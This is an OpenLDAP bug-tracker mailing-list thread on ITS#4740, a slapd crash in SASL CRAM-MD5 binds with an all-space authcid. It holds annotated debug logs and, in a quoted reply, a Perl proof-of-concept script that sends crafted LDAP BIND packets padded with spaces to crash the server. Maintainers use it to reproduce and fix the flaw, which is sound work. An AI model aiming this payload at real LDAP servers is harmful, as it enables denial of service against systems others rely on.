[Date Prev][Date Next] [Chronological] [Thread] [Top]

Re: (ITS#4740) SASL bind assert



 From the provided log, looks like it's a SASL/CRAM-MD5
authentication with lots of spaces in the authcid.

Logs:
>>>> dnPrettyNormal: <>
><<< dnPrettyNormal: <>, <>
>do_sasl_bind: dn () mech CRAM-MD5

empty bind DN

>==> sasl_bind: dn="" mech=<continuing> datalen=1024
>SASL Canonicalize [conn=21]:
>authcid="
>"

authcid of spaces.

>slap_sasl_getdn: conn 21
>id=
>[len=255]

255 spaces.

>=> ldap_dn2bv(16)
><=
>ldap_dn2bv(uid=\20
>\20,cn=CRAM-MD5,cn=auth)=0
>slap_sasl_getdn: u:id converted to
>uid=\20
>\20,cn=CRAM-MD5,cn=auth

OKAY.

>>>> dnNormalize:
><uid=\20
>\20,cn=CRAM-MD5,cn=auth>
>=>
>ldap_bv2dn(uid=\20
>\20,cn=CRAM-MD5,cn=auth,0)
><=
>ldap_bv2dn(uid=\20
>\20,cn=CRAM-MD5,cn=auth)=0
>=> ldap_dn2bv(272)
><= ldap_dn2bv(uid=\20,cn=cram-md5,cn=auth)=0

BAD!  We lost 254 spaces (last of which was escaped).

><<< dnNormalize: <uid=\20,cn=cram-md5,cn=auth>
>==>slap_sasl2dn: converting SASL name uid=\20,cn=cram-md5,cn=auth to a DN
>slap_authz_regexp: converting SASL name uid=\20,cn=cram-md5,cn=auth
><==slap_sasl2dn: Converted SASL name to <nothing>
>SASL Canonicalize [conn=21]: slapAuthcDN="uid=\20,cn=cram-md5,cn=auth"
>

At 07:13 PM 11/27/2006, hyc@symas.com wrote:
>bthomas@google.com wrote:
>> ------=_Part_8120_20176863.1164676496288
>> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>> Content-Transfer-Encoding: 7bit
>> Content-Disposition: inline
>> 
>> Hello,
>> 
>> It would appear from my testing that this bug is not fixed. I have compiled
>> and installed 2.3.30 and verified that my version of getdn.c (1.124.2.5) has
>> the fixes that were introduced in 1.134. However, a nessus scan that
>> attempts to exploit this bug still succeeds in crashing slapd, with debug
>> output attached below (I've snipped the actual data passsed in, suffice to
>> say it's 255 0x20's).
>> 
>> I'm happy to provide any other information as needed. I've taken a look at
>> the diffs but haven't been able to find what the problem is.
>
>This is the perl script I used to verify the bug here. slapd works fine 
>for me with this. If you can tell us how to reproduce the crash, we can 
>investigate further.
>
>use IO::Socket;
>
>         my $host = "localhost";
>         my $port = 9011;
>
>         my $sock = IO::Socket::INET->new(
>                         Proto   => "tcp",
>                         PeerAddr => $host,
>                         PeerPort => $port, )
>                         or die "Error creating socket";
>
>         print "Sending LDAP BIND request...\n";
>
>         my 
>$s="\x30\x17\x02\x02\x04\xe7\x60\x11\x02\x01\x03\x04\x00\xa3\x0a\x04";
>         $s .= "\x08\x43\x52\x41\x4d\x2d\x4d\x44\x35";
>                 print $sock $s;
>
>         my $buf = '                                        ';
>         read( $sock, $buf, 24 );
>
>         $s  = 
>"\x30\x82\x04\x1f\x02\x02\x04\xe6\x60\x82\x04\x17\x02\x01\x03\x04";
>         $s .= 
>"\x00\xa3\x82\x04\x0e\x04\x08\x43\x52\x41\x4d\x2d\x4d\x44\x35\x04";
>         $s .= "\x82\x04\x00";
>         $s .= "\x20" x 1024;
>
>         print "Sending second LDAP BIND request...\n";
>
>         print $sock $s;
>         close $sock;
>
>         print "Done\n";
>
>-- 
>   -- Howard Chu
>   Chief Architect, Symas Corp.  http://www.symas.com
>   Director, Highland Sun        http://highlandsun.com/hyc
>   OpenLDAP Core Team            http://www.openldap.org/project/